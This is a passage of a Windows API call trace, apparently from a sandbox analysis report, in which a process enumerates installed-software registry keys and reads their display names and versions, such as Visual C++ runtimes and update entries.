RegEnumKeyExW (in: hKey=0x480, dwIndex=0x26, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.625] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x27, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.625] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x28, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.625] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x29, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.625] RegEnumKeyExW (in: hKey=0x480, dwIndex=0x2a, lpName=0x27a4d4c, lpcchName=0x43eba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x43eba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0278.625] RegOpenKeyExW (in: hKey=0x480, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.626] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.626] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.626] RegCloseKey (hKey=0x484) returned 0x0 [0278.626] RegOpenKeyExW (in: hKey=0x480, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.626] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.627] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.627] RegCloseKey (hKey=0x484) returned 0x0 [0278.627] RegOpenKeyExW (in: hKey=0x480, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.627] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.627] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.627] RegCloseKey (hKey=0x484) returned 0x0 [0278.627] RegOpenKeyExW (in: hKey=0x480, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.628] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.628] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.628] RegCloseKey (hKey=0x484) returned 0x0 [0278.628] RegOpenKeyExW (in: hKey=0x480, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.628] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.628] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.628] RegCloseKey (hKey=0x484) returned 0x0 [0278.628] RegOpenKeyExW (in: hKey=0x480, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.629] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.629] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.629] RegCloseKey (hKey=0x484) returned 0x0 [0278.629] RegOpenKeyExW (in: hKey=0x480, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.629] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.629] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.629] RegCloseKey (hKey=0x484) returned 0x0 [0278.629] RegOpenKeyExW (in: hKey=0x480, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.630] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.630] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.630] RegCloseKey (hKey=0x484) returned 0x0 [0278.630] RegOpenKeyExW (in: hKey=0x480, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.630] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.630] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.630] RegCloseKey (hKey=0x484) returned 0x0 [0278.630] RegOpenKeyExW (in: hKey=0x480, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.630] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.630] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.630] RegCloseKey (hKey=0x484) returned 0x0 [0278.631] RegOpenKeyExW (in: hKey=0x480, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.631] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.631] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.631] RegCloseKey (hKey=0x484) returned 0x0 [0278.631] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.631] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x7e) returned 0x0 [0278.631] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27a6fa0, lpcbData=0x43eb80*=0x7e | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpcbData=0x43eb80*=0x7e) returned 0x0 [0278.631] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x18) returned 0x0 [0278.631] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27a710c, lpcbData=0x43eb80*=0x18 | out: lpType=0x43eb84*=0x1, lpData="14.25.28508", lpcbData=0x43eb80*=0x18) returned 0x0 [0278.683] RegCloseKey (hKey=0x484) returned 0x0 [0278.683] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.683] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x76) returned 0x0 [0278.683] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27aca00, lpcbData=0x43eb80*=0x76 | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpcbData=0x43eb80*=0x76) returned 0x0 [0278.683] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x16) returned 0x0 [0278.683] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27acb5c, lpcbData=0x43eb80*=0x16 | out: lpType=0x43eb84*=0x1, lpData="12.0.21005", lpcbData=0x43eb80*=0x16) returned 0x0 [0278.683] RegCloseKey (hKey=0x484) returned 0x0 [0278.684] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.684] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.684] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.684] RegCloseKey (hKey=0x484) returned 0x0 [0278.684] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.684] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.684] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.684] RegCloseKey (hKey=0x484) returned 0x0 [0278.685] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.685] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.685] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.685] RegCloseKey (hKey=0x484) returned 0x0 [0278.685] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.685] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.685] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.685] RegCloseKey (hKey=0x484) returned 0x0 [0278.686] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.686] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.686] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.686] RegCloseKey (hKey=0x484) returned 0x0 [0278.686] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.686] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.686] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.686] RegCloseKey (hKey=0x484) returned 0x0 [0278.687] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.687] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.687] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x0, lpData=0x0, lpcbData=0x43eb80*=0x0) returned 0x2 [0278.687] RegCloseKey (hKey=0x484) returned 0x0 [0278.687] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.687] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x78) returned 0x0 [0278.687] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27adb80, lpcbData=0x43eb80*=0x78 | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpcbData=0x43eb80*=0x78) returned 0x0 [0278.687] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x18) returned 0x0 [0278.687] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27adcdc, lpcbData=0x43eb80*=0x18 | out: lpType=0x43eb84*=0x1, lpData="14.25.28508", lpcbData=0x43eb80*=0x18) returned 0x0 [0278.687] RegCloseKey (hKey=0x484) returned 0x0 [0278.688] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.688] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x7a) returned 0x0 [0278.688] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27ae060, lpcbData=0x43eb80*=0x7a | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpcbData=0x43eb80*=0x7a) returned 0x0 [0278.688] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x1a) returned 0x0 [0278.688] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27ae1c4, lpcbData=0x43eb80*=0x1a | out: lpType=0x43eb84*=0x1, lpData="11.0.61030.0", lpcbData=0x43eb80*=0x1a) returned 0x0 [0278.688] RegCloseKey (hKey=0x484) returned 0x0 [0278.689] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.689] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x7a) returned 0x0 [0278.689] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27ae548, lpcbData=0x43eb80*=0x7a | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpcbData=0x43eb80*=0x7a) returned 0x0 [0278.689] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x1a) returned 0x0 [0278.689] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27ae6ac, lpcbData=0x43eb80*=0x1a | out: lpType=0x43eb84*=0x1, lpData="12.0.30501.0", lpcbData=0x43eb80*=0x1a) returned 0x0 [0278.689] RegCloseKey (hKey=0x484) returned 0x0 [0278.689] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.689] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x86) returned 0x0 [0278.689] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27aea5c, lpcbData=0x43eb80*=0x86 | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpcbData=0x43eb80*=0x86) returned 0x0 [0278.690] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x1c) returned 0x0 [0278.690] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27aebd8, lpcbData=0x43eb80*=0x1c | out: lpType=0x43eb84*=0x1, lpData="14.25.28508.3", lpcbData=0x43eb80*=0x1c) returned 0x0 [0278.737] RegCloseKey (hKey=0x484) returned 0x0 [0278.738] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.738] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x86) returned 0x0 [0278.738] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27aef6c, lpcbData=0x43eb80*=0x86 | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpcbData=0x43eb80*=0x86) returned 0x0 [0278.738] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x1c) returned 0x0 [0278.738] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27af0e8, lpcbData=0x43eb80*=0x1c | out: lpType=0x43eb84*=0x1, lpData="14.25.28508.3", lpcbData=0x43eb80*=0x1c) returned 0x0 [0278.738] RegCloseKey (hKey=0x484) returned 0x0 [0278.738] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.738] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x54) returned 0x0 [0278.739] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27af47c, lpcbData=0x43eb80*=0x54 | out: lpType=0x43eb84*=0x1, lpData="Microsoft Visual C++ 2005 Redistributable", lpcbData=0x43eb80*=0x54) returned 0x0 [0278.739] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x14) returned 0x0 [0278.739] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x27af590, lpcbData=0x43eb80*=0x14 | out: lpType=0x43eb84*=0x1, lpData="8.0.61001", lpcbData=0x43eb80*=0x14) returned 0x0 [0278.739] RegCloseKey (hKey=0x484) returned 0x0 [0278.739] RegOpenKeyExW (in: hKey=0x480, lpSubKey="{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x43eb64 | out: phkResult=0x43eb64*=0x484) returned 0x0 [0278.739] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, lpData=0x0, lpcbData=0x43eb80*=0x5e) returned 0x0 [0278.739] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayName", lpReserved=0x0, lpType=0x43eb84, lpData=0x27af8d8, lpcbData=0x43eb80*=0x5e | out: lpType=0x43eb84*=0x1, lpData="Office 16 Click-to-Run Extensibility Component", lpcbData=0x43eb80*=0x5e) returned 0x0 [0278.739] RegQueryValueExW (in: hKey=0x484, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x43eb84, lpData=0x0, lpcbData=0x43eb80*=0x0 | out: lpType=0x43eb84*=0x1, 